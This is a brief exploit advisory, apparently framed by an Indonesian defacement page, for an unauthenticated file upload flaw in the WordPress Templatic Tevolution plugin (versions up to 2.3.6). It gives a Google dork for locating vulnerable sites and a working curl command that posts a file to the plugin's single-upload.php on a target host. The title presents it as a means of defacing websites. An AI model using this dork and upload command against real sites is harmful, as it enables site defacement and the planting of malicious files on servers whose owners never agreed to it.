Deface Dengan WordPress Templatic

Deface Dengan WordPress Templatic

# Exploit Title: WordPress Templatic <= 2.3.6 Tevolution File Upload Vulnerability
# Date: 30-12-2016
# Software Link: Permium plugin
# Vendor Homepage:
# Exploit Author: r3m1ck
# Website:
# Category: webapps
# Google Dork: inurl:"wp-content/plugins/Tevolution/"

1. Description

Wordpress Slider Templatic Tevolution <= 2.3.6 suffers from file upload vulnerability.
Tevolution is not available for sale, it comes bundled with certain premium themes from templatic.

2. Proof of Concept

curl -k -X POST -F "file=@./ina.txt" http://VICTIM/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php

3. Uploaded file location:

Because this vulnerability plugin bundled with some premium themes from templatic, the location will be depends on the themes' name.


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